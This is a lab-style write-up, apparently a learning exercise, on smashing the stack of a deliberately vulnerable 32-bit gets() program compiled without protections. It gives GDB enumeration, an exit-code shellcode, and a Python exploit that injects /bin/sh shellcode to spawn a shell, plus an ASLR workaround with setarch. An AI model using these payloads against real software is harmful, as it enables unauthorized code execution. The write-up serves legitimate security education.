Writeup
Authors:
-
0x42697262
-
Jinx
-
Orochi
TL;DR
Open GDB
gdb vuln
Run the program once
(gdb) r
Then exit (CTRL+C) and dissassemble the symbol vuln
(gdb) disas vuln
Dump of assembler code for function vuln:
0x5655617d <+0>: push %ebp
0x5655617e <+1>: mov %esp,%ebp
0x56556180 <+3>: sub $0x8,%esp
0x56556183 <+6>: lea -0x8(%ebp),%eax
0x56556186 <+9>: push %eax
0x56556187 <+10>: call 0xf7c741b0 <_IO_gets>
0x5655618c <+15>: add $0x4,%esp
0x5655618f <+18>: nop
0x56556190 <+19>: leave
0x56556191 <+20>: ret
End of assembler dump.
Add a breakpoint on the first instruction and run it once again
(gdb) b *0x5655617d
Breakpoint 1 at 0x5655617d: file vuln.c, line 3.
(gdb) r
Breakpoint 1, vuln () at vuln.c:3
3 void vuln() {
Print the address of the variable buffer
(gdb) p &buffer
$1 = (char (*)[8]) 0xffffcd18
Craft the exploit with the shellcode payload and memory address of the buffer
\x31\xc0\x40\x89\xc3\xcd\x80\x90\x90\x90\x90\x90\x18\xcd\xff\xff
Execute the exploit inside GDB
(gdb) r <<< $(echo -ne "\x31\xc0\x40\x89\xc3\xcd\x80\x90\x90\x90\x90\x90\x18\xcd\xff\xff")
The program should terminate with the exit status code 1
[Inferior 1 (process 1027954) exited with code 01]
Introduction
A vulnerable C source code is provided that accepts an unbounded number of non-null byte characters from standard input.
The goal is to construct a shellcode to cause the program to terminate with a desired exit code of 1
using a stack smashing attack.
Note that crashes due to malformed "shellcode" will not result in an exit code of 1
and therefore will not count.
Pre-requisites
Vulnerable C Source Code
// vuln.c
#include <stdio.h>
void vuln() {
char buffer[8];
gets(buffer);
}
int main() {
vuln();
while (1) {
}
}
Compilation with disabled security protections
$ gcc -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -fno-pie -ggdb -z execstack vuln.c -o vuln
-
-fno-stack-protector
disables stack smashing protection. -
-m32
generate 32-bit architecture code. -
-mpreferred-stack-boundary=2
stack boundary should be aligned in 4 bytes. -
-ggdb
generate debug information compatible with the GDB debugger. -
-fno-pie
disables position-independent executable (PIE) generation which randomizes the base address of the executable. -
-z execstack
sets the stack as executable.
This compilation step is necessary otherwise it would almost be a bit harder to execute this type of buffer overflow.
*** stack smashing detected ***: terminated
[1] 1024635 IOT instruction (core dumped)
Shellcode
Generally, we should acquire the shellcode somewhere like Shell-Storm.
But for the sake of learning, we can generate our own shellcode.
Knowledge in assembly language would be needed.
We have this shellcode that terminates the program with exit status code 1
section .text
global main
main:
xor eax, eax ; Clear EAX register
inc eax ; Increment EAX to 1
mov ebx, eax ; Move the value of EAX into EBX (not %eab)
int 0x80 ; Invoke system call
To compile,
$ nasm -f elf32 shellcode.asm -o shellcode.o
This should output an ELF LSB relocatable code ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
.
To acquire the shellcode to be used for the explotation payload, we can use objdump
$ objdump -M intel -d solutions/shellcode.o
Its output would be
solutions/shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
0: 31 c0 xor eax,eax
2: 40 inc eax
3: 89 c3 mov ebx,eax
5: cd 80 int 0x80
Putting all the bytes together, our shellcode is
\x31\xc0\x40\x89\xc3\xcd\x80
Which is just 7 bytes long.
Methodology
The exit shellcode is 7 bytes long, small enough to fit inside the buffer, which has a size of 8 bytes.
The memory address location of the buffer
will be used as the return address, as it is where the shellcode will be stored.
The next stack after buffer
is the base pointer (EBP), and after the base pointer is the return address of the vuln
function, which will be modified to point to the memory address of the buffer
.
With this, an exploit can be crafted to terminate the program with the desired exit status code of 1
.
First, run GDB with the program as the parameter
$ gdb vuln
And should be greeted with
Reading symbols from vuln...
(gdb)
But set the assembly language syntax first to Intel
(gdb) set disassembly-flavor intel
Enumeration
Since the binary is not stripped, the function symbols can be printed.
Disassemble the main
and vuln
symbols in assembly language using the disassemble
command.
(gdb) disassemble main
Dump of assembler code for function main:
0x00001192 <+0>: push ebp
0x00001193 <+1>: mov ebp,esp
0x00001195 <+3>: call 0x117d <vuln>
0x0000119a <+8>: jmp 0x119a <main+8>
End of assembler dump.
(gdb) disassemble vuln
Dump of assembler code for function vuln:
0x0000117d <+0>: push ebp
0x0000117e <+1>: mov ebp,esp
0x00001180 <+3>: sub esp,0x8
0x00001183 <+6>: lea eax,[ebp-0x8]
0x00001186 <+9>: push eax
0x00001187 <+10>: call 0x1188 <vuln+11>
0x0000118c <+15>: add esp,0x4
0x0000118f <+18>: nop
0x00001190 <+19>: leave
0x00001191 <+20>: ret
End of assembler dump.
The address of buffer
must be known.
However, breakpoints cannot be added yet since the memory of the program is not yet allocated.
(gdb) run
And exit (CTRL+C).
Disassemble the symbols again for vuln
:
(gdb) disassemble vuln
Dump of assembler code for function vuln:
0x5655617d <+0>: push ebp
0x5655617e <+1>: mov ebp,esp
0x56556180 <+3>: sub esp,0x8
0x56556183 <+6>: lea eax,[ebp-0x8]
0x56556186 <+9>: push eax
0x56556187 <+10>: call 0xf7c741b0 <_IO_gets>
0x5655618c <+15>: add esp,0x4
0x5655618f <+18>: no
0x56556190 <+19>: leave
0x56556191 <+20>: ret
End of assembler dump.
The proper memory addresses can now be seen.
Add a breakpoint to the first instruction push ebp
:
(gdb) break *0x5655617d
Breakpoint 1 at 0x5655617d: file vuln.c, line 3.
An *
is needed since the address is a pointer.
Define hooks for the breakpoint:
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/1i $eip
>x/16wx $esp
>end
These commands will automatically execute once a breakpoint is hit. What it does is print out the instruction pointer of the current function and print out the 16 bytes of the stack pointer.
Rerun the program:
(gdb) run
=> 0x5655617d <vuln>: push ebp
0xffffcd24: 0x5655619a 0x00000000 0xf7c20af9 0x00000001
0xffffcd34: 0xffffcde4 0xffffcdec 0xffffcd50 0xf7e1fe2c
0xffffcd44: 0x56556192 0x00000001 0xffffcde4 0xf7e1fe2c
0xffffcd54: 0xffffcdec 0xf7ffcb60 0x00000000 0xa8a49fe9
Breakpoint 1, vuln () at vuln.c:3
3 void vuln() {
There are still no inputs provided here but the memory address of the buffer
can already be acquired.
(gdb) print &buffer
$1 = (char (*)[8]) 0xffffcd18
The memory address of buffer
is stored at 0xffffcd18
and this is where the standard input is stored.
To check, add another breakpoint on the ret
instruction and continue the execution:
(gdb) break *0x56556191
Breakpoint 2 at 0x56556191: file vuln.c, line 6.
(gdb) continue
Continuing.
AAAABBBBCCCCDDDDAAAABBBBCCCCDDDD
=> 0x56556191 <vuln+20>: ret
0xffffcd24: 0x44444444 0x41414141 0x42424242 0x43434343
0xffffcd34: 0x44444444 0xffffcd00 0xffffcd50 0xf7e1fe2c
0xffffcd44: 0x56556192 0x00000001 0xffffcde4 0xf7e1fe2c
0xffffcd54: 0xffffcdec 0xf7ffcb60 0x00000000 0xa8a49fe9
Breakpoint 2, 0x56556191 in vuln () at vuln.c:6
6 }
The input for this was AAAABBBBCCCCDDDDAAAABBBBCCCCDDDD
as can be seen, the bytes got replaced up until 0xffffcd37
.
The contents of the buffer
and the succeeding pointers can be checked by using the command x/16wx
:
(gdb) x/16wx &buffer
0xffffcd18: 0x41414141 0x42424242 0x43434343 0x44444444
0xffffcd28: 0x41414141 0x42424242 0x43434343 0x44444444
0xffffcd38: 0xffffcd00 0xffffcd50 0xf7e1fe2c 0x56556192
0xffffcd48: 0x00000001 0xffffcde4 0xf7e1fe2c 0xffffcdec
The first 8 bytes (0x41414141 0x42424242
) are the buffer’s contents.
The next 4 bytes (0x43434343
) is the base pointer.
The next 4 bytes (0x44444444
) is the return address which will be modified to point to the address of the buffer
(at 0xffffcd18
).
Exploitation
We can use any means necessary to send raw bytes to the input, but to make things simpler, we will be using echo
.
Notice that the structure of the memory address is as follows:
[ 0x-------- 0x-------- ] [ 0x-------- ] [ 0x-------- ] ...
buffer ebp esp
The payload \x31\xc0\x40\x89\xc3\xcd\x80
can be stored on the `buffer’s memory space:
[ 0x8940c031 0x--80cdc3 ] [ 0x-------- ] [ 0x-------- ] ...
buffer ebp esp
Notice that the raw bytes are stored in little-endian system.
Since the size of the payload is only 7 bytes long, NOP (no operation) instruction must be appended in order for the return address (ESP) to be modified. The total size of the buffer and the EBP is 12 bytes. Thus, there are 5 bytes worth of NOPs to be padded.
[ 0x8940c031 0x9080cdc3 ] [ 0x90909090 ] [ 0x-------- ] ...
buffer ebp esp
The equivalent shellcode is now \x31\xc0\x40\x89\xc3\xcd\x80\x90\x90\x90\x90\x90
.
Next is to add the memory address of the buffer
.
[ 0x8940c031 0x9080cdc3 ] [ 0x90909090 ] [ 0xffffcd18 ] ...
buffer ebp esp
Thus, the final shellcode is \x31\xc0\x40\x89\xc3\xcd\x80\x90\x90\x90\x90\x90\x18\xcd\xff\xff
.
We can store the shellcode to our egg
:
$ echo -ne "\x31\xc0\x40\x89\xc3\xcd\x80\x90\x90\x90\x90\x90\x18\xcd\xff\xff" > egg
Documentation of Proofs
To execute the exploit, run:
(gdb) run < egg
or
(gdb) run <<< $(echo -ne "\x31\xc0\x40\x89\xc3\xcd\x80\x90\x90\x90\x90\x90\x18\xcd\xff\xff")
Which should successfully terminate the program with desired exit status:
[Inferior 1 (process 1075597) exited with code 01]
Conclusion
Stack smashing is an archaic method of binary exploitation and past computers are vulnerable against this type of exploitation.
However, thanks to the Address Space Layout Randomization (ASLR) that modern operating systems are equipped with, it would be very difficult to execute this exploit in the current times.
Aside from ASLR, the egg
machine code would not work universally to different computers due to how memory layouts are arranged since not every computers have the same memory size and the same applications ran.
Nonetheless, this is a fun exercise and we have learned a lot from it.
Solution files can be found here:
Acknowledgement and References
-
LiveOverflow for usage of GDB.
-
Phrack Volume 7 Issue 49: Smashing The Stack For Fun And Profit for teaching us on smashing the stack.
-
Practical Binary Analysis for teaching assembly and basics of ELF.
-
Shell-Storm for providing shellcodes.
Extra
Return Me Shell!
Writing a shellcode for exit status is quite boring.
Why don’t we pop a shell instead?
Since it’s annoying to use echo
to generate our shellcode, we will be using our handy scripting language… Python!
To pop a shell, we need a shellcode for it. Thankfully, we don’t need to make one from scratch (because assembly is pain y’know) thanks to Shell-Storm.
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
This is probably at least 40 bytes long which does not fit inside the buffer’s 8 byte size.
Save the shellcode in Python and add the other stuffs as well
OFFSET = b"\x41"
EIP = b"\x18\xcd\xff\xff"
NOP = b"\x90"
SHELLCODE = b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
exploit = OFFSET * 12 + EIP + NOP*4 + SHELLCODE
print(exploit)
And that’s it!
Except this would not work because of how Python’s print()
function works.
To prove this, we will compare echo’s output against Python’s output
$ echo -ne "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x18\xcd\xff\xff\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" > eggshell
$ xxd eggshell
00000000: 4141 4141 4141 4141 4141 4141 18cd ffff AAAAAAAAAAAA....
00000010: 9090 9090 31c0 31db b006 cd80 5368 2f74 ....1.1.....Sh/t
00000020: 7479 682f 6465 7689 e331 c966 b912 27b0 tyh/dev..1.f..'.
00000030: 05cd 8031 c050 682f 2f73 6868 2f62 696e ...1.Ph//shh/bin
00000040: 89e3 5053 89e1 99b0 0bcd 80 ..PS.......
$ python exploit2.py > eggshell2 && xxd eggshell2
00000000: 6222 4141 4141 4141 4141 4141 4141 5c78 b"AAAAAAAAAAAA\x
00000010: 3138 5c78 6364 5c78 6666 5c78 6666 5c78 18\xcd\xff\xff\x
00000020: 3930 5c78 3930 5c78 3930 5c78 3930 315c 90\x90\x90\x901\
00000030: 7863 3031 5c78 6462 5c78 6230 5c78 3036 xc01\xdb\xb0\x06
00000040: 5c78 6364 5c78 3830 5368 2f74 7479 682f \xcd\x80Sh/ttyh/
00000050: 6465 765c 7838 395c 7865 3331 5c78 6339 dev\x89\xe31\xc9
00000060: 665c 7862 395c 7831 3227 5c78 6230 5c78 f\xb9\x12'\xb0\x
00000070: 3035 5c78 6364 5c78 3830 315c 7863 3050 05\xcd\x801\xc0P
00000080: 682f 2f73 6868 2f62 696e 5c78 3839 5c78 h//shh/bin\x89\x
00000090: 6533 5053 5c78 3839 5c78 6531 5c78 3939 e3PS\x89\xe1\x99
000000a0: 5c78 6230 5c78 3062 5c78 6364 5c78 3830 \xb0\x0b\xcd\x80
000000b0: 220a ".
$ sha256sum eggshell eggshell2
b0200afddf57b3321ec88b73cddd7d7118fbac8cb8f9c8f781d3b1a0053367cd eggshell
2fb5cad2ba0574d4ac536518b463de6ed4846e8f4dfa635910b71d7c1cdcc757 eggshell2
As you can see, the raw bytes of Python’s print output is a mess and the hash values are not the same. Hence, Python’s print function should not be used But, this can be fixed by using a standard library output. The updated code is now:
import sys
OFFSET = b"\x41"
EIP = b"\x18\xcd\xff\xff"
NOP = b"\x90"
SHELLCODE = b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
exploit = OFFSET * 12 + EIP + NOP*4 + SHELLCODE
sys.stdout.buffer.write(exploit)
Checking it once again:
$ python exploit2.py > eggshell2 && xxd eggshell2
00000000: 4141 4141 4141 4141 4141 4141 18cd ffff AAAAAAAAAAAA....
00000010: 9090 9090 31c0 31db b006 cd80 5368 2f74 ....1.1.....Sh/t
00000020: 7479 682f 6465 7689 e331 c966 b912 27b0 tyh/dev..1.f..'.
00000030: 05cd 8031 c050 682f 2f73 6868 2f62 696e ...1.Ph//shh/bin
00000040: 89e3 5053 89e1 99b0 0bcd 80 ..PS.......
$ sha256sum eggshell eggshell2
b0200afddf57b3321ec88b73cddd7d7118fbac8cb8f9c8f781d3b1a0053367cd eggshell
b0200afddf57b3321ec88b73cddd7d7118fbac8cb8f9c8f781d3b1a0053367cd eggshell2
Both shellcodes are now equal.
Python can now be used to exploit the vulnerable binary:
$ python exploit.py | ./vuln
This is done by piping Python’s output to the input of the program. However, this would not work and would cause an illegal instruction error:
[1] 1090485 done python exploit2.py |
1090486 segmentation fault (core dumped) ./vuln
This is because of ASLR randomizing the memory allocations everytime the program is run. To disable ASLR without disabling the system’s protection, one can do this:
$ python exploit.py | setarch $(uname -m) -R ./vuln
This execution may or may not work as the memory addresses in GDB compared to being run directly are different. This can be fixed by figuring out the exact memory address. There are many ways to do it but the simplest one that we have already done is through GDB and attaching GDB to the process of the program. The process of debugging with an attached process is similar.
First run the vulnerable program with setarch
and open up another terminal with GDB by attaching to the vulnerable process:
$ setarch $(uname -m) -R ./vuln
$ gdb -p <process id>
To find the process id, use ps aux
.
And if this does not work, we can use gcore
to dump the current memory of a process id and manually find our input:
$ gcore <process id>
Run the program again and find its process id:
$ setarch $(uname -m) -R ./vuln
$ ps aux | grep vuln
birb 1450296 71.4 0.0 2732 1096 pts/9 R+ 10:32 5:17 ./vuln
Here, the process id is 1450296
.
We then dump the memory of the process after our input back in the program (I used ABCD
):
$ gcore 1450296
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
0x5655619a in main ()
Saved corefile core.1450296
[Inferior 1 (process 1450296) detached]
This will create a core file dump in binary format.
Read the coredump in hex using any hex editor tools available, we’ll use good old xxd
and pipe it to vim
:
$ xxd -g 4 core.1450296 | vim
Then find the input (which is ABCD
).
There will be two results, find the memory addresses that contains the most likely data:
...
000043c0: 00000000 00000000 00000000 00000000 ................
000043d0: 11040000 41424344 0a000000 00000000 ....ABCD........
000043e0: 00000000 00000000 00000000 00000000 ................
...
vs:
...
00074f50: 00000000 2cfee1f7 0cceffff 60cbfff7 ....,.......`...
00074f60: 40cdffff 8c615556 38cdffff 41424344 @....aUV8...ABCD
00074f70: 00000000 48cdffff 9a615556 00000000 ....H....aUV....
...
The second result is more likely to contain the EBP and ESP.
We will use 0xffffcd48
(which is taken from 0xffffcd38
by adding 16 bytes) as the new return address
Replace the EIP in the script with the correct return address, we can now rerun the exploit:
$ python exploit.py | setarch $(uname -m) -R ./vuln
sh-5.2$ uname -a
Linux NuclearChicken 6.7.4-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 05 Feb 2024 22:07:49 +0000 x86_64 GNU/Linux
And voila! We got a shell!
To conclude, there is not much difference in doing this method compared to GDB aside from automating the exploitation. The difficulty of running the program outside GDB lies on the ASLR (if enabled) and computers allocating memory differently. Aside from that, for the shellcode, there is no need to include the NOPs.